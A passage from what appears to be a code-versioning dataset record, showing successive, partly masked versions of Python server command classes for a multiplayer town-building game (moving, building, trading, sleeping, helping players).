HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-3": "<mask token>\n\n\nclass MovePlayerCommand(ServerCommand):\n <mask token>\n <mask token>\n\n def __repr__(self):\n msg = 'Move ServerCommand : {}'.format(self._direction)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.\n check_result)\n AvailableCheck(player).check(self.check_result)\n for tile in self._get_tiles_coordinates_dict().values():\n if tile not in self.town.backgrounds.keys():\n self.check_result += 'tile {} not in town'.format(tile)\n return\n BackgroundMovementCheck(self.town.backgrounds[tile], player).check(\n self.check_result)\n\n def _do(self):\n x_dest, y_dest = self.tile_dest\n player = self.town.get_player(self.client_id)\n player.status = 'move'\n player.direction = self._direction\n player.energy.value -= MovePlayerCommand.ENERGY_COST\n player.x = x_dest\n player.y = y_dest\n\n @property\n def tile_dest(self) ->tuple:\n movement_matrix = {}\n movement_matrix['left'] = -1, 0\n movement_matrix['right'] = +1, 0\n movement_matrix['up'] = 0, -1\n movement_matrix['down'] = 0, +1\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n background = self.town.backgrounds[tile]\n bg_multiplicator = background.move_multiplicator\n x_dest = player.x + movement_matrix[self._direction][0\n ] * bg_multiplicator * player.velocity\n y_dest = player.y + movement_matrix[self._direction][1\n ] * bg_multiplicator * player.velocity\n return x_dest, y_dest\n\n def _get_tiles_coordinates_dict(self):\n x_dest, y_dest = self.tile_dest\n tiles_coordinates_dict = {'topleft': (math.floor(x_dest), math.\n floor(y_dest)), 'topright': (math.floor(x_dest + 0.99), math.\n floor(y_dest)), 'bottomleft': (math.floor(x_dest), math.floor(\n y_dest + 0.99)), 'bottomright': (math.floor(x_dest + 0.99),\n math.floor(y_dest + 0.99))}\n return tiles_coordinates_dict\n\n @classmethod\n def from_json_dict(cls, json_dict) ->MovePlayerCommand:\n return cls(json_dict['direction'])\n <mask token>\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.backgrounds:\n self.check_result += 'tile {} not in town'.format(self._tile)\n return\n background = self.town.backgrounds[self._tile]\n BackgroundBuildCheck(background, self._building_name).check(self.\n check_result)\n if self._tile in self.town.buildings:\n self.check_result += (\"Can't build {} : {} already built on {}\"\n .format(self._building_name, self.town.buildings[self._tile\n ].name, self._tile))\n\n def _do(self):\n self.town.set_building(BuildingFactory.create_building_by_name(self\n ._building_name), self._tile)\n\n def __repr__(self):\n msg = 'Build ServerCommand : {} in {}'.format(self._building_name,\n self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->BuildCommand:\n return cls(json_dict['tile'], json_dict['building_name'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build'\n json_dict['building_name'] = self._building_name\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-4": "<mask token>\n\n\nclass MovePlayerCommand(ServerCommand):\n <mask token>\n\n def __init__(self, direction: str):\n ServerCommand.__init__(self)\n self._direction = direction\n\n def __repr__(self):\n msg = 'Move ServerCommand : {}'.format(self._direction)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.\n check_result)\n AvailableCheck(player).check(self.check_result)\n for tile in self._get_tiles_coordinates_dict().values():\n if tile not in self.town.backgrounds.keys():\n self.check_result += 'tile {} not in town'.format(tile)\n return\n BackgroundMovementCheck(self.town.backgrounds[tile], player).check(\n self.check_result)\n\n def _do(self):\n x_dest, y_dest = self.tile_dest\n player = self.town.get_player(self.client_id)\n player.status = 'move'\n player.direction = self._direction\n player.energy.value -= MovePlayerCommand.ENERGY_COST\n player.x = x_dest\n player.y = y_dest\n\n @property\n def tile_dest(self) ->tuple:\n movement_matrix = {}\n movement_matrix['left'] = -1, 0\n movement_matrix['right'] = +1, 0\n movement_matrix['up'] = 0, -1\n movement_matrix['down'] = 0, +1\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n background = self.town.backgrounds[tile]\n bg_multiplicator = background.move_multiplicator\n x_dest = player.x + movement_matrix[self._direction][0\n ] * bg_multiplicator * player.velocity\n y_dest = player.y + movement_matrix[self._direction][1\n ] * bg_multiplicator * player.velocity\n return x_dest, y_dest\n\n def _get_tiles_coordinates_dict(self):\n x_dest, y_dest = self.tile_dest\n tiles_coordinates_dict = {'topleft': (math.floor(x_dest), math.\n floor(y_dest)), 'topright': (math.floor(x_dest + 0.99), math.\n floor(y_dest)), 'bottomleft': (math.floor(x_dest), math.floor(\n y_dest + 0.99)), 'bottomright': (math.floor(x_dest + 0.99),\n math.floor(y_dest + 0.99))}\n return tiles_coordinates_dict\n\n @classmethod\n def from_json_dict(cls, json_dict) ->MovePlayerCommand:\n return cls(json_dict['direction'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'move'\n json_dict['direction'] = self._direction\n return json_dict\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.backgrounds:\n self.check_result += 'tile {} not in town'.format(self._tile)\n return\n background = self.town.backgrounds[self._tile]\n BackgroundBuildCheck(background, self._building_name).check(self.\n check_result)\n if self._tile in self.town.buildings:\n self.check_result += (\"Can't build {} : {} already built on {}\"\n .format(self._building_name, self.town.buildings[self._tile\n ].name, self._tile))\n\n def _do(self):\n self.town.set_building(BuildingFactory.create_building_by_name(self\n ._building_name), self._tile)\n\n def __repr__(self):\n msg = 'Build ServerCommand : {} in {}'.format(self._building_name,\n self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->BuildCommand:\n return cls(json_dict['tile'], json_dict['building_name'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build'\n json_dict['building_name'] = self._building_name\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n 